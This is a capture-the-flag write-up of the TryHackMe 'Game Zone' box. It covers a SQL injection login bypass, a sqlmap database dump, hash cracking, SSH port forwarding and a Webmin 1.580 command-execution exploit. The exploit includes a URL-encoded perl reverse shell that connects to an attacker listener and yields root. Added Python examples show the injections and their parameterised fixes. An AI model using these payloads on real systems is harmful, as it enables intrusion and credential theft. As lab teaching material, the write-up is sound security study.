Game Zone | Writeup

CTF, CyberSecurity, TryHackMe

Game Zone #

Hello guys, I'm a big fan of SQL injection vulnerabilities and I've been in love with sqlmap for ages, so we are lucky to have this box to work on. It is not hard at all and very easy if you follow along carefully. Try it out at Game Zone.

Enumeration #

Nmap scan and results:

nmap -sV -p- -vv BoxIP

22/tcp open ssh
80/tcp open http

So we have a web server and an SSH service running. Let's start with the web server:

http://Box-IP:80/

Exploitation #

We find a login page with an Agent 47 image. The login form is vulnerable to SQL injection, which lets us bypass authentication.

Try this to bypass the login (the quote closes the username string, or '1' = '1' makes the WHERE clause true for every row, and -- - comments out the rest of the query, including the password check):

USERNAME: admin' or '1' = '1'; -- -

PASSWORD: vvv

After logging in we find a search bar. Trying a few more injection payloads confirms that the searchitem parameter of the search form is also vulnerable to SQL injection.
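As an added example that is not part of the original writeup, here is what both injections do, reproduced against an in-memory SQLite table. The schema, the constructed user and password, and the use of SHA-256 for the stored hash are assumptions (the real names only come out of the sqlmap dump later); MySQL on the box treats these two payloads the same way. The vulnerable queries sit next to their parameterised versions.

```python
import hashlib
import sqlite3

# Added example (not code from the writeup or the Game Zone box): the two
# injection points above, reproduced against an in-memory SQLite database.
# Schema, user, password and SHA-256 for the stored hash are constructed
# assumptions; the real names come out of the sqlmap dump.

USER = "admin"
PASSWORD = "correct horse"            # constructed, not the box's password
PWD_HASH = hashlib.sha256(PASSWORD.encode()).hexdigest()

LOGIN_BYPASS = "admin' or '1' = '1'; -- -"                   # payload from the writeup
SEARCH_DUMP = "%' UNION SELECT username, pwd FROM users -- -"  # what sqlmap automates


def build_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, pwd TEXT)")
    db.execute("INSERT INTO users VALUES (?, ?)", (USER, PWD_HASH))
    db.execute("CREATE TABLE post (name TEXT, description TEXT)")
    db.executemany("INSERT INTO post VALUES (?, ?)",
                   [("Hitman", "Stealth"), ("Portal", "Puzzle")])
    return db


def login_vulnerable(db, username, password):
    # The username is pasted straight into the SQL text. With the payload the
    # query becomes:
    #   ... WHERE username = 'admin' or '1' = '1'; -- -' AND pwd = '<hash>'
    # The quote closes the string, or '1' = '1' is true for every row and
    # "-- -" turns the password check into a comment.
    pwd_hash = hashlib.sha256(password.encode()).hexdigest()
    query = (f"SELECT username FROM users WHERE username = '{username}' "
             f"AND pwd = '{pwd_hash}'")
    row = db.execute(query).fetchone()
    return row[0] if row else None


def login_safe(db, username, password):
    # Parameterised: the driver sends the values separately from the SQL text,
    # so the quote and comment characters in the payload are just data.
    pwd_hash = hashlib.sha256(password.encode()).hexdigest()
    row = db.execute(
        "SELECT username FROM users WHERE username = ? AND pwd = ?",
        (username, pwd_hash),
    ).fetchone()
    return row[0] if row else None


def search_vulnerable(db, term):
    # The post-login search box: the term lands inside a LIKE pattern. A UNION
    # with the same number of columns appends rows from any other table.
    query = f"SELECT name, description FROM post WHERE name LIKE '%{term}%'"
    return db.execute(query).fetchall()


def search_safe(db, term):
    # Same query, parameterised. Note that % and _ in the term still act as
    # LIKE wildcards; escape them if that matters for your application.
    return db.execute(
        "SELECT name, description FROM post WHERE name LIKE ?", (f"%{term}%",)
    ).fetchall()


if __name__ == "__main__":
    db = build_db()
    print("bypass (vulnerable):", login_vulnerable(db, LOGIN_BYPASS, "vvv"))
    print("bypass (safe):      ", login_safe(db, LOGIN_BYPASS, "vvv"))
    print("dump   (vulnerable):", search_vulnerable(db, SEARCH_DUMP))
    print("dump   (safe):      ", search_safe(db, SEARCH_DUMP))
```

The vulnerable login returns the admin row for the bypass payload with any password, and the vulnerable search returns the users table appended to the posts; the parameterised versions return nothing for the same inputs.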

Now we can jump to sqlmap to dump the database.

What do we need?

  1. The HTTP request the search form sends (capture it with Burp Suite or the browser's developer tools)
  2. That request saved to a file
  3. sqlmap

Result: a table with a username and a password hash.

Command:

sqlmap -r dirofrequest.txt --dbms=mysql --dump

| Option | Meaning |
| --- | --- |
| -r | use the saved request file |
| --dbms | back-end database type (MySQL here) |
| --dump | dump the table entries |


To crack the hash, use any offline tool (hashcat or john with a wordlist) or an online lookup service.
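As an added example that is not from the writeup, this is what "offline cracking" of an unsalted hash comes down to. The writeup does not say which algorithm produced the dumped hash, so the code guesses candidate algorithms from the digest length and hashes every wordlist entry with each of them. The wordlist and the target hashes are constructed here; in practice the target is the value from the sqlmap dump and the wordlist is something like rockyou.txt.

```python
import hashlib

# Added example, not from the writeup. The dumped hash's algorithm is not
# stated, so candidate unsalted algorithms are guessed from the hex length and
# a wordlist is run against each one. hashcat/john and online lookups do the
# same thing, only much faster.

ALGOS_BY_HEX_LENGTH = {
    32: ["md5"],
    40: ["sha1"],
    64: ["sha256"],
    128: ["sha512"],
}


def candidate_algorithms(hexdigest):
    """Unsalted algorithms whose hex digest has this length."""
    return ALGOS_BY_HEX_LENGTH.get(len(hexdigest.strip()), [])


def crack(hexdigest, words):
    """Return (algorithm, plaintext) for the first word hashing to hexdigest, else None.

    `words` is any iterable of str or bytes, so a wordlist file opened in
    binary mode can be streamed line by line. Hashing the raw bytes matters:
    rockyou.txt mixes encodings, and re-encoding lines would change them.
    """
    target = hexdigest.strip().lower()
    algos = candidate_algorithms(target)
    if not algos:
        return None
    for word in words:
        data = word if isinstance(word, bytes) else word.encode()
        data = data.rstrip(b"\r\n")
        for algo in algos:
            if hashlib.new(algo, data).hexdigest() == target:
                return algo, data.decode("utf-8", "replace")
    return None


def crack_with_file(hexdigest, path):
    with open(path, "rb") as fh:
        return crack(hexdigest, fh)


# Constructed wordlist and targets for the demo.
WORDLIST = ["password", "123456", "letmein", "gamezone", "agent47"]
SHA256_TARGET = hashlib.sha256(b"agent47").hexdigest()
MD5_TARGET = hashlib.md5(b"letmein").hexdigest()

if __name__ == "__main__":
    print(crack(SHA256_TARGET, WORDLIST))
    print(crack(MD5_TARGET, WORDLIST))
```

crack_with_file(hash, "/usr/share/wordlists/rockyou.txt") is the realistic call; a None result means the hash is either salted, a different algorithm, or simply not in the list.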

Reverse SSH tunnels #

As we found earlier, SSH is open, so we try to log in with the credentials we just cracked.

With sshpass, so the password goes on the command line:

sshpass -p Password ssh -l Username Box-Ip 

Then run:

ss -tulpn

ss lists the sockets on the host (-t TCP, -u UDP, -l listening only, -p owning process, -n numeric ports instead of service names).

We find several listening TCP sockets. One of them is on port 10000, which nmap did not show from the outside, so it is blocked by firewall rules and only reachable from the box itself.

So exit the SSH session (Ctrl+Z would only suspend the shell, not end it) and log back in with a local port forward (-L), which makes the box's port 10000 reachable on our own machine as localhost:10000:

 ssh -L 10000:localhost:10000  Username@Box-Ip

User Flag: we already have a shell as this user, so we can grab the user flag now.

Then browse to

http://localhost:10000/

and log in with the same credentials.

The service on port 10000 is Webmin version 1.580 (a web-based system administration tool that runs as root).

Reverse shell #

Run searchsploit webmin, which points to:

https://www.exploit-db.com/exploits/21851

We have two options to exploit it: Metasploit or manually...

Go manual for faster results. The Metasploit module (excerpt below) already tells us everything we need: an authenticated user with access to the File Manager module gets command execution as root through the path passed to /file/show.cgi.

'Name'           => 'Webmin /file/show.cgi Remote Command Execution',
'Description'    => %q{
    This module exploits an arbitrary command execution vulnerability in Webmin
    1.580. The vulnerability exists in the /file/show.cgi component and allows an
    authenticated user, with access to the File Manager Module, to execute arbitrary
    commands with root privileges. The module has been tested successfully with Webmin
    1.580 over Ubuntu 10.04.
},

res = send_request_cgi(
  {
    'uri'     => "/file/show.cgi/bin/#{rand_text_alphanumeric(rand(5) + 5)}|#{command}|",
    'cookie'  => "sid=#{session}"
  }, 25)

Through the tunnel from the previous step the request shape is (RANDOM is any five or more random alphanumeric characters; the #{...} in the module is Ruby interpolation, not something the browser understands):

http://localhost:10000/file/show.cgi/bin/RANDOM|COMMAND|

Start a listener first (nc -lvnp Your-PORT), then put the perl reverse shell in as the command, with Your-ip and Your-PORT replaced by your listener:

http://localhost:10000/file/show.cgi/bin/RANDOM|perl%20-e%20'use%20Socket;$i=%22Your-ip%22;$p=Your-PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname(%22tcp%22));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,%22%3E&S%22);open(STDOUT,%22%3E&S%22);open(STDERR,%22%3E&S%22);exec(%22/bin/sh%20-i%22);};'%20|

The perl one-liner is from http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

Root Flag #

Webmin runs as root, so the shell that comes back to our listener is a root shell and we can read the root flag.

The end …see you next time